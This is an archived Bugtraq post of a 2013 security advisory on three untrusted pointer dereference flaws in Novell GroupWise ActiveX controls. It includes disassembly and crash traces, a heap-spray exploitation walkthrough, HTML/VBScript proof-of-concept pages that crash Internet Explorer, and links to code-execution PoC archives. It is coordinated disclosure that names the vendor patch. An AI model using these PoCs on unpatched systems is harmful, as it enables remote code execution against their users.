Home page logo
/

bugtraq logo Bugtraq mailing list archives

Novell GroupWise Multiple Remote Code Execution Vulnerabilities
From: advisory () htbridge com
Date: Wed, 3 Apr 2013 13:40:30 +0200 (CEST)

Advisory ID: HTB23131
Product: Novell GroupWise
Vendor: Novell Inc.
Vulnerable Version(s): 12.0.0.8586 and probably prior
Tested Version: 12.0.0.8586 on Windows 7 SP1 and Internet Explorer 9.0
Vendor Notification: November 26, 2012 
Vendor Patch: January 30, 2013 
Public Disclosure: April 3, 2013 
Vulnerability Type: Untrusted Pointer Dereference [CWE-822]
CVE Reference: CVE-2013-0804
Risk Level: Critical 
CVSSv2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple untrusted pointer dereference vulnerabilities in Novell 
GroupWise, which could be exploited to compromise a remote system.


1) Untrusted Pointer Dereference in Novell GroupWise: CVE-2013-0804

1.1 The vulnerability exists due to an untrusted pointer dereference error in the InvokeContact() method within the 
ActiveX control (gwabdlg.dll, GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default in "C:\Program 
Files\Novell\GroupWise\gwabdlg.dll"

A remote attacker can pass an arbitrary value to the pInvokeParams argument of the InvokeContact() method and trigger 
the ACCESS_VIOLATION exception on a MOV EAX, DWORD  PTR [EAX+4] instruction. 

Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the 
heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the 
EAX register.

5722D301   8B40 04          MOV EAX,DWORD PTR DS:[EAX+4]

Later this value will be allocated into the stack:

5722D304   8985 24FFFFFF    MOV DWORD PTR SS:[EBP-DC],EAX

The code continues its flow and enters a switch case algorithm:


5722D30A   83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1
5722D311   0F84 57010000    JE gwabdlg.5722D46E
5722D317   83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2
5722D31E   0F84 00010000    JE gwabdlg.5722D424

5722D324   83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3

5722D32B   0F84 83010000    JE gwabdlg.5722D4B4
5722D331   83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4
5722D338   0F84 AF020000    JE gwabdlg.5722D5ED
5722D33E   83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5
5722D345   0F84 9A030000    JE gwabdlg.5722D6E5
5722D34B   83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6


If an attacker can specify a custom switch value, in this case the number 3, it will jump to the address 0x5722D4B4

5722D4B4   8B45 08          MOV EAX,DWORD PTR SS:[EBP+8]
5722D4B7   8945 D4          MOV DWORD PTR SS:[EBP-2C],EAX
5722D4BA   8365 D8 00     AND DWORD PTR SS:[EBP-28],0
5722D4BE   8D45 D8          LEA EAX,DWORD PTR SS:[EBP-28]
5722D4C1   50                   PUSH EAX
5722D4C2   68 58122D57    PUSH gwabdlg.572D1258
5722D4C7   8B45 D4          MOV EAX,DWORD PTR SS:[EBP-2C]
5722D4CA   8B40 30          MOV EAX,DWORD PTR DS:[EAX+30]
5722D4CD   8B4D D4         MOV ECX,DWORD PTR SS:[EBP-2C]
5722D4D0   8B49 30           MOV ECX,DWORD PTR DS:[ECX+30]
5722D4D3   8B00               MOV EAX,DWORD PTR DS:[EAX]
5722D4D5   51                   PUSH ECX
5722D4D6   FF10              CALL DWORD PTR DS:[EAX]

After entering into this function, and since the EAX register is completely under the attacker control, it is possible 
to supply another custom pointer that will be executed after the code reaches the CALL DWORD PTR DS:[EAX] instruction:


0C0C0C0C   0C 0C           OR AL,0C
0C0C0C0E   0C 0C            OR AL,0C
0C0C0C10   0300              ADD EAX,DWORD PTR DS:[EAX]
0C0C0C12   0000              ADD BYTE PTR DS:[EAX],AL
0C0C0C14   0C 0C            OR AL,0C
0C0C0C16   0C 0C            OR AL,0C
0C0C0C18   0C 0C            OR AL,0C
0C0C0C1A   0C 0C           OR AL,0C



Crash details:

(162c.5ae0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4
eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program 
Files\Novell\GroupWise\gwabdlg.dll - 
gwabdlg!DllUnregisterServer+0x4c10e:
5722d301 8b4004          mov     eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????



The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
 arg1=202116104
 target.InvokeContact arg1 
End Sub
</script>
<body>
<h3> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4> Untrusted Pointer Dereference PoC </h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF'
id='Target'></object>
</html>



Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray 
exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_1.zip";>https://www.htbridge.com/advisory/HTB23131_POC_1.zip</a>
Archive's Password: HTB23131_novell(gw)


1.2 The vulnerability exists due to an untrusted pointer dereference error in the GenerateSummaryPage() method within 
the ActiveX control (gwabdlg.dll, GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default in "C:\Program 
Files\Novell\GroupWise\gwabdlg.dll".

A remote attacker can pass an arbitrary value to the pInvokeParams argument of the GenerateSummaryPage() method and 
trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD  PTR [EAX+4] instruction. 

Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the 
heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the 
EAX register.

5722D301   8B40 04          MOV EAX,DWORD PTR DS:[EAX+4]

Later this value will be allocated into the stack:

5722D304   8985 24FFFFFF    MOV DWORD PTR SS:[EBP-DC],EAX

The code continues its flow and enters a switch case algorithm:

5722D30A   83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1
5722D311   0F84 57010000    JE gwabdlg.5722D46E
5722D317   83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2
5722D31E   0F84 00010000    JE gwabdlg.5722D424

5722D324   83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3

5722D32B   0F84 83010000    JE gwabdlg.5722D4B4
5722D331   83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4
5722D338   0F84 AF020000    JE gwabdlg.5722D5ED
5722D33E   83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5
5722D345   0F84 9A030000    JE gwabdlg.5722D6E5
5722D34B   83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6


If an attacker can specify a custom switch value, in this case the number 3, it will jump to address 0x5722D4B4

5722D4B4   8B45 08          MOV EAX,DWORD PTR SS:[EBP+8]
5722D4B7   8945 D4          MOV DWORD PTR SS:[EBP-2C],EAX
5722D4BA   8365 D8 00       AND DWORD PTR SS:[EBP-28],0
5722D4BE   8D45 D8          LEA EAX,DWORD PTR SS:[EBP-28]
5722D4C1   50               PUSH EAX
5722D4C2   68 58122D57      PUSH gwabdlg.572D1258
5722D4C7   8B45 D4          MOV EAX,DWORD PTR SS:[EBP-2C]
5722D4CA   8B40 30          MOV EAX,DWORD PTR DS:[EAX+30]
5722D4CD   8B4D D4          MOV ECX,DWORD PTR SS:[EBP-2C]
5722D4D0   8B49 30          MOV ECX,DWORD PTR DS:[ECX+30]
5722D4D3   8B00             MOV EAX,DWORD PTR DS:[EAX]
5722D4D5   51               PUSH ECX
5722D4D6   FF10             CALL DWORD PTR DS:[EAX]

After entering into this function, and since the EAX register is completely under the attacker control, it is possible 
to supply another custom pointer that will be executed after the code reaches the CALL DWORD PTR DS:[EAX] instruction.

0C0C0C0C   0C 0C           OR AL,0C
0C0C0C0E   0C 0C            OR AL,0C
0C0C0C10   0300              ADD EAX,DWORD PTR DS:[EAX]
0C0C0C12   0000              ADD BYTE PTR DS:[EAX],AL
0C0C0C14   0C 0C            OR AL,0C
0C0C0C16   0C 0C            OR AL,0C
0C0C0C18   0C 0C            OR AL,0C
0C0C0C1A   0C 0C           OR AL,0C



Crash details:

(162c.5ae0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4
eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program 
Files\Novell\GroupWise\gwabdlg.dll - 
gwabdlg!DllUnregisterServer+0x4c10e:
5722d301 8b4004          mov     eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????



The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
arg1=202116108
arg2="defaultV"
arg3="defaultV"
target.GenerateSummaryPage arg1 ,arg2 ,arg3
End Sub
</script>
<body>
<h3> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4>Untrusted Pointer Dereference PoC</h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 
0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF'
id='Target'></object>
</html>



Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray 
exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_2.zip";>https://www.htbridge.com/advisory/HTB23131_POC_2.zip</a>
Archive's Password: HTB23131_novell(gw)


1.3 The vulnerability exists due to an untrusted pointer dereference error in the SecManageRecipientCertificates() 
method within the ActiveX control (gwmim1.ocx, GUID {BFEC5A01-1EB1-11D1-BC96-00805FC1C85A}, located by default in 
"C:\Program Files\Novell\GroupWise\gwmim1.ocx".

A remote attacker can pass an arbitrary value to the lProp argument of the SecManageRecipientCertificates() method and 
trigger the ACCESS_VIOLATION exception on a MOV EDX,DWORD PTR DS:[ECX] instruction. 
Since it is possible to supply a specially crafted pointer, an attacker can abuse this flaw relying on the heap-spray 
technique. After the crash, the application moves the value of the supplied pointer into the EDX register.
10014805   MOV EDX,DWORD PTR DS:[ECX]

Later the same operation is performed, however this time it is the EAX register that inherits the untrusted pointer 
value.
10014807   MOV EAX,DWORD PTR DS:[EDX]

Eventually code execution is reached at the address 0x10014809
10014809   CALL EAX


Crash details:

(5c78.58f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0275c46c ebx=00000000 ecx=0c0c0c0c edx=0000001b esi=0956de40 edi=00000000
eip=10014805 esp=0275c45c ebp=0275c55c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwmim1.ocx - 
gwmim1!DllUnregisterServer+0x8cb5:
10014805 8b11            mov     edx,dword ptr [ecx]  ds:0023:0c0c0c0c=????????



The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
 arg1=202116108
 target.SecManageRecipientCertificates arg1
End Sub
</script>
<body>
<h3>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4> Untrusted Pointer Dereference PoC </h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:BFEC5A01-1EB1-11D1-BC96-00805FC1C85A'id='Target'></object>          
</html>



Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray 
exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_3.zip";>https://www.htbridge.com/advisory/HTB23131_POC_3.zip</a>
Archive's Password: HTB23131_novell(gw)


-----------------------------------------------------------------------------------------------

Solution:

Apply GroupWise 8.0.3 Hot Patch 2 (or later) or GroupWise 2012 SP1 Hot Patch 1

More Information:
http://www.novell.com/support/kb/doc.php?id=7011687

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23131 - https://www.htbridge.com/advisory/HTB23131 - Novell GroupWise Multiple Remote 
Code Execution Vulnerabilities.
[2] Novell Inc. - http://www.novell.com - Novell GroupWise is a collaboration software for large enterprises.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] Novell GroupWise Untrusted Pointer Dereference Exploitation - 
https://www.htbridge.com/publications/novell_groupwise_untrusted_pointer_dereference_exploitation.html

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.


  By Date           By Thread  

Current thread:
  • Novell GroupWise Multiple Remote Code Execution Vulnerabilities advisory (Apr 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]